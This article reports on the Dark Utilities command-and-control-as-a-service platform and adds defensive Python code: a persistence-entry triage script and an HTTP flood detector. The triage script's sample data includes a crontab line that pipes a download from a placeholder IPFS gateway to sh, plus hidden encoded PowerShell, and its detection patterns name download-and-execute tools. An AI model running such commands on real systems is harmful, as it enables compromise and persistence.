Cybercriminals can now use a new service called Dark Utilities to build up a command and control (C2) center for their malicious activities.
Dark Utilities launched in 2022 as a C2-as-a-Service platform. It bundles many functions, including cryptomining, DDoS, and remote access capabilities. The platform has approximately 3,000 users so far, and because its services are offered at minimal cost, it is appealing to adversaries who want to carry out attacks without building their own C2 servers. As a result, more malware variants may use the platform for C2 in the future.
How Are These Services Provided?
Dark Utilities supports numerous architectures and requires no special development resources from its users. Cisco Talos observed “efforts underway to expand OS and system architecture support.” Payloads are distributed as code that runs on victim systems; on execution, the payload registers the system with the service and establishes a C2 channel.
In their blog, Cisco Talos indicated: “We observed malware samples using this service in the wild to establish C2 communications channels and remote access capabilities on infected systems. We’ve observed malware targeting Windows and Linux systems leveraging Dark Utilities.”
Creation of the Dark Utilities
Dark Utilities is operated by its lead creator, Inplex-sys, who does not appear to have a lengthy history on cybercriminal forums; instead, their activity is confined to the Telegram and Discord channels where Dark Utilities offers technical support to its customers. Inplex-sys was observed advertising on the Lapsus$ Telegram channel when Dark Utilities was created.
The Functionality of the Dark Utilities Platform
For user authentication, the Dark Utilities platform uses Discord. A payload must be created and deployed on victim machines to register new bots with the service. The platform is compatible with several operating systems.
The platform generates a command string for the chosen operating system, which threat actors typically embed in PowerShell or Bash scripts to retrieve and run the payload on victim systems. The selected payload also establishes persistence on the target: a Registry key on Windows, or a Crontab entry or Systemd service on Linux.
Below is an instance of a payload aimed at the Windows operating system.
The platform has introduced support for new architectures like ARM64 and ARMV71, targeting embedded devices like routers, phones, and internet-of-things (IoT) devices.
Dark Utilities provides complete C2 capabilities over both the Tor network and the open internet. It hosts payloads on the InterPlanetary File System (IPFS), a decentralized network for storing and distributing data.
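The two details above that a defender can act on are the persistence locations (Run keys, crontab entries, systemd units) and the use of IPFS for payload hosting. The following triage script is an added example, not code from the article or from Cisco Talos: it scans persistence entries collected from a host for the traits described here (encoded or hidden-window PowerShell, download-and-pipe-to-shell one-liners, IPFS gateway paths, execution from temporary directories) and decodes an encoded PowerShell command so an analyst can read it. All entries in SAMPLE_ENTRIES are constructed for illustration and are not indicators from the article; the heuristic names are my own.

```python
"""Heuristic triage of host persistence entries for download-and-execute loaders.

Added example, not the article's or Cisco Talos's code. SAMPLE_ENTRIES below are
constructed for illustration only; they are not real indicators of compromise.
"""
import base64
import re
from typing import Iterable, List, NamedTuple, Optional, Tuple


class Finding(NamedTuple):
    location: str          # where the entry lives (registry path, crontab owner, unit file)
    reasons: Tuple[str, ...]


# Encoded PowerShell: "-e", "-ec", "-enc" or "-encodedcommand" followed by a base64 blob.
ENCODED_PS = re.compile(
    r"powershell(?:\.exe)?\b.*?\s-(?:e|ec|enc|encodedcommand)\s+(?P<blob>[A-Za-z0-9+/=]{16,})",
    re.I,
)

# Each heuristic is a triage signal, not a verdict; a hit means "look at this entry".
HEURISTICS = [
    ("download-and-execute pipeline", re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba|z|da)?sh\b", re.I)),
    ("encoded PowerShell command", ENCODED_PS),
    ("PowerShell hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("PowerShell web download", re.compile(r"(?:Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient)", re.I)),
    ("IPFS-hosted content", re.compile(r"/ipfs/[A-Za-z0-9]{40,}|\bipfs\.", re.I)),
    ("execution from temp or world-writable path", re.compile(r"/tmp/|/dev/shm/|\\Temp\\|%TEMP%", re.I)),
]


def triage_entry(location: str, command: str) -> Optional[Finding]:
    """Return a Finding listing every heuristic the command matches, or None if clean."""
    reasons = tuple(name for name, rx in HEURISTICS if rx.search(command))
    return Finding(location, reasons) if reasons else None


def triage_all(entries: Iterable[Tuple[str, str]]) -> List[Finding]:
    """Triage (location, command) pairs and keep only the entries with at least one hit."""
    return [f for f in (triage_entry(loc, cmd) for loc, cmd in entries) if f]


def decode_encoded_powershell(command: str) -> Optional[str]:
    """Decode the base64/UTF-16LE blob PowerShell expects after -EncodedCommand."""
    m = ENCODED_PS.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("blob")).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample entries (hypothetical, not from the article). The encoded
# PowerShell payload is a harmless Write-Host so the decode step can be verified.
ENCODED_DEMO = base64.b64encode("Write-Host hello".encode("utf-16le")).decode()

SAMPLE_ENTRIES = [
    # Windows Run key: hidden-window, encoded PowerShell (suspicious)
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     f"powershell.exe -w hidden -enc {ENCODED_DEMO}"),
    # Windows Run key: ordinary vendor updater (benign)
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorUpdate",
     r'"C:\Program Files\Vendor\Updater.exe" /background'),
    # Crontab: fetch from an IPFS gateway path and pipe to a shell (suspicious)
    ("crontab:root",
     "@reboot curl -fsSL http://gateway.invalid/ipfs/Qm" + "A" * 44 + " | sh"),
    # Crontab: routine certificate renewal (benign)
    ("crontab:root", "0 3 * * * /usr/bin/certbot renew --quiet"),
    # systemd unit: ExecStart launches a binary dropped in /tmp (suspicious)
    ("/etc/systemd/system/agent.service",
     "ExecStart=/bin/sh -c '/tmp/.agent --daemon'"),
]


if __name__ == "__main__":
    for finding in triage_all(SAMPLE_ENTRIES):
        print(f"{finding.location}: {', '.join(finding.reasons)}")
    print("decoded:", decode_encoded_powershell(SAMPLE_ENTRIES[0][1]))
```

In practice the entries would come from exporting the Run/RunOnce keys, every user's crontab and the systemd unit directories; the heuristics are deliberately broad, so treat a hit as a queue for analyst review rather than an automatic block.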
The platform includes a “Manager” administration panel. The panel contains numerous built-in modules for launching DDoS attacks, mining cryptocurrency, and executing commands across the systems under the account's control, and it lists those systems.
The platform has two built-in DDoS attack interfaces, each handling a variety of techniques. Layer 4 supports TCP, UDP, and ICMP, in addition to methods designed specifically for gaming platforms such as Teamspeak3, Fivem, GMOD, and Valve, and for certain video games such as “Counter-Strike: Global Offensive” and “Among Us.” Layer 7 supports the GET, POST, HEAD, PATCH, PUT, DELETE, OPTIONS, and CONNECT methods. The interface provides forms for configuring Layer 4 and Layer 7 DDoS attacks, respectively, as seen below.
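From the defender's side, the Layer 7 capability above shows up in web server logs as a burst of requests from each bot, often using methods the application never needs. The following detector is an added example, not code from the article or from any named tool: it parses Common Log Format lines, keeps a sliding per-source request window, and raises one alert when a source exceeds a request budget and one per HTTP method outside an allow-list. The log lines are constructed for this example (documentation IP ranges, fixed timestamps); the window size, threshold and allowed methods are assumed values to be tuned per site.

```python
"""Sliding-window HTTP flood and unexpected-method detector over access log lines.

Added example, not the article's code. SAMPLE_LOG is constructed for illustration.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone
from typing import Iterable, List, Optional, Tuple

# Common Log Format: 203.0.113.7 - - [10/Aug/2022:12:00:00 +0000] "GET / HTTP/1.1" 200 512
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line: str) -> Optional[Tuple[float, str, str]]:
    """Return (epoch seconds, source ip, method) or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z").timestamp()
    return ts, m.group("ip"), m.group("method")


def detect_floods(lines: Iterable[str], window_s: float = 10.0, max_requests: int = 20,
                  allowed_methods=frozenset({"GET", "POST", "HEAD"})) -> List[Tuple[str, str, object]]:
    """Emit (ip, "rate", count) once a source exceeds max_requests inside window_s seconds,
    and (ip, "method", METHOD) once per disallowed HTTP method a source uses."""
    windows = defaultdict(deque)          # ip -> timestamps inside the current window
    flagged = set()                       # (ip, kind) already alerted, to avoid repeats
    alerts: List[Tuple[str, str, object]] = []
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue
        ts, ip, method = event
        q = windows[ip]
        q.append(ts)
        while q and ts - q[0] > window_s:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > max_requests and (ip, "rate") not in flagged:
            flagged.add((ip, "rate"))
            alerts.append((ip, "rate", len(q)))
        if method not in allowed_methods and (ip, method) not in flagged:
            flagged.add((ip, method))
            alerts.append((ip, "method", method))
    return alerts


# Constructed sample log: one normal visitor and one source hammering the site with
# methods the application never uses (assumed values, not data from the article).
_BASE = datetime(2022, 8, 10, 12, 0, 0, tzinfo=timezone.utc)


def _line(ip: str, offset_s: float, method: str, path: str = "/") -> str:
    ts = (_BASE + timedelta(seconds=offset_s)).strftime("%d/%b/%Y:%H:%M:%S %z")
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 512'


SAMPLE_LOG = (
    [_line("198.51.100.5", i * 3, "GET", "/index.html") for i in range(4)]
    + [_line("203.0.113.7", i * 0.25, ("OPTIONS", "PATCH", "CONNECT")[i % 3]) for i in range(30)]
)


if __name__ == "__main__":
    for alert in detect_floods(SAMPLE_LOG):
        print(alert)
```

A per-source counter like this catches a single noisy bot; a distributed flood from many sources at low individual rates needs the same window applied per path or globally, with the per-source budget lowered, which is a one-line change to the key used for `windows`.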
Additionally, the platform offers distributed command execution and a Discord grabber, both of which can be run against numerous systems simultaneously.
When a compromised user account is used to establish an active C2 channel on an infected system, the attacker gains complete access to the machine; an interactive PowerShell prompt is available within the admin panel.
The platform’s documentation provides detailed instructions for performing reconnaissance, spotting vulnerabilities, and exploiting them to “infect servers” for use in a botnet, letting the hackers save time and resources while creating malware.
IoCs can be found in this GitHub repository.